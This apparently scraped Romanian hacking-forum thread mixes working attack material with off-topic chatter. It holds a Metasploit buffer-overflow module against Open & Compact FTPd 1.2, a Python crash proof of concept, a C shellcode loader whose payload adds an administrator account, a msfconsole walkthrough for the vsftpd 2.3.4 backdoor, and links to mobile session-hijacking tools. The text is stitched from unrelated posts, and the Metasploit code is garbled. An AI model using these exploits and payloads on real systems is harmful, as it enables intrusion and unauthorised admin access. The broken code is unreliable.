mDOS

Exploit causes the ftp server to crash so adduser, etc. payloads are most effective. require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, 'Name' => 'Open & Compact FTPd 1.2 Pre-Authentication Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in the USER verb in Open & Compact FTPd version 1.2. The program will crash once the payload is sent, so bind shell payloads are not effective. }, 'Author' => 'Blake', 'License' => MSF_LICENSE, 'Version' => 'Version 1', 'References' => [ [ 'EDB-ID', '11420'], [ 'URL', 'http://www.exploit-db.com/exploits/11420' ], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 400, 'BadChars' => "\x00\x20\x0a\x0d", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP2/SP3 English', { 'Ret' => 0x00202c42 } ], ], 'DisclosureDate' => 'Feb 12, 2010', 'DefaultTarget' => 0)) end def exploit connect sploit = "\x42\x2c\x20" * 199 sploit << make_nops(10) sploit << payload.encoded print_status("Trying target {target.name<http://target.name>}...") login = "USER + sploit + \r\n" login << "PASS " + rand_text_alphanumeric(12) sock.put(login + "\r\n") handler disconnect end end

# Title: Open & Compact FTPd Pre-Authentication Crash (PoC) # #!/usr/bin/python #Registers From Immunity # #EAX FFFFFFFF #ECX 00149A29 #EDX 7C90E4F4 ntdll.KiFastSystemCallRet #EBX 00000000 #ESP 0012FA1C #EBP 00000002 #ESI 0012FA5C #EDI 0012FCB4 #EIP 004113A3 #C 0 ES 0023 32bit 0(FFFFFFFF) #P 1 CS 001B 32bit 0(FFFFFFFF) #A 0 SS 0023 32bit 0(FFFFFFFF) #Z 0 DS 0023 32bit 0(FFFFFFFF) #S 1 FS 003B 32bit 7FFDF000(FFF) #T 0 GS 0000 NULL #D 0 #O 0 LastErr ERROR_SUCCESS (00000000) #EFL 00010286 (NO,NB,NE,A,S,PE,L,LE) #ST0 empty %#.19L #ST1 empty -??? FFFF 7C910208 7C90E900 #ST2 empty -UNORM DCD0 7C9101BB 7C91017B #ST3 empty %#.19L #ST4 empty +UNORM 00B2 00000000 00000000 #ST5 empty +UNORM 7D80 77F67D78 01C3DA90 #ST6 empty -UNORM DD24 00000000 00000409 #ST7 empty -UNORM E3F4 0014E3F4 0014E3F4 # 3 2 1 0 E S P U O Z D I #FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) #FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 import socket buffer = ("\x41\x2C\x20") * 200 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('192.168.1.112',21)) s.recv(1024) s.send('USER '+buffer+'\r\n') s.recv(1024)

Trebuia sa o pui paia cu Call of duty

eh

#include <stdio.h> #include <windows.h> int main(){ unsigned char shellcode[]= "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B" "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9" "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C" "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0" "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B" "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72" "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47" "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F" "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72" "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66" "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14" "\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE" "\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53" "\xFF\xD2\x6A\x05\xEB\x23\xFF\xD0\x68\x65" "\x73\x73\x01\x8B\xDF\xFE\x4C\x24\x03\x68" "\x50\x72\x6F\x63\x68\x45\x78\x69\x74\x54" "\xFF\x74\x24\x1C\xFF\x54\x24\x1C\x57\xFF" "\xD0\xE8\xD8\xFF\xFF\xFF\x63\x6D\x64\x2E" "\x65\x78\x65\x20\x2F\x63\x20\x6E\x65\x74" "\x20\x75\x73\x65\x72\x20\x52\x75\x62\x62" "\x65\x72\x44\x75\x63\x6B\x20\x6D\x75\x64" "\x62\x61\x74\x68\x20\x2F\x61\x64\x64\x20" "\x26\x26\x20\x6E\x65\x74\x20\x6C\x6F\x63" "\x61\x6C\x67\x72\x6F\x75\x70\x20\x61\x64" "\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x6F" "\x72\x73\x20\x52\x75\x62\x62\x65\x72\x44" "\x75\x63\x6B\x20\x2F\x61\x64\x64\x00"; LPVOID lpAlloc; void (*pfunc)(); printf("size = %i bytes\n", lstrlen(shellcode) + 1); printf("-------------------------\nUsername: CEVA\nPassword: CEVA\n"); system("PAUSE"); lpAlloc = VirtualAlloc(0, 4096, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if(lpAlloc == NULL){ printf("Memory not allocated!\n"); return 0; } memcpy(lpAlloc, shellcode, lstrlen(shellcode) + 1); pfunc = lpAlloc; pfunc(); return 0; } NU UITA SA INLOCUL CEVA-UL ACELA CU CEVA

Merge sa fac eu pe saracu sa imi dai mie aia 30 de lei ??

Nu cred ca se poate sa faci asta deoarece bateria de la NOKIA este mai mica decat o baterie externa si chiar daca ai reusii sa faci asta nu cred ca mai mult de 3 procente ar incarca.

Ok o sa fac mai tarziu

Ce ne trebuie: -Linux -Metasploit Framework 1.Deschidem terminalul sau shell-ul si scriem in el "msfconsole". (https://imgur.com/a/ZxWjcoM) Acesta este backdoor-ul pe care il vom folosii in tutorial :"exploit/unix/ftp/vsftpd_234_backdoor" 2.use exploit/unix/ftp/vsftpd_234_backdoor. 3.Set RHOST ip-ul victimei/serverului (aceasta comanda este folosita pentru a seta hostul victimei/serverului) 4. exploit (ruleaza exploitul) Cam asa ar trebuii sa arate atacul nostru: https://imgur.com/yTmv7AM ATENTIE: Acest exploit a fost testat pe o masina virtuala(Metasploitable)

Diseara il facem

Vreti sa fac un tutorial despre cum sa faci un shellcode pe telefon??

Pentru inceput descarcam aplicatia "TERMUX". LINK>https://play.google.com/store/apps/details?id=com.termux SHELLS: >Bash >Fish >IPython >Tcsh >Xonsh >zsh ---------------------------------------- Tutorial instalare la FISH: 1.termux-setup-storage 2.pkg install fish 3.Pentru a rula scrieti fish ------------------------------------------ Celelalte shell-uri se instaleaza similar cu cel de sus. BAFTA

Vrei sa zici ca vrei sa folosesti un Nokia vechi pe post de baterie externa nu?

Ce ne trebuie: -Telefon android +4.0 -root Apliatiile utile: -zANTI -dsploit/csploit -droidsheep Aplicatia zANTI am folosit-o cel mai mult deoarece are o interfata foarte usor de folosit si poate fi la indemana oricui Link zANTI>https://www.zimperium.com/zanti-mobile-penetration-testing link droidsheep>http://droidsheep.downloadxapp.com/ link dsploit>https://www.apksum.com/app/dsploit/it.evilsocket.dsploit

Sunt noob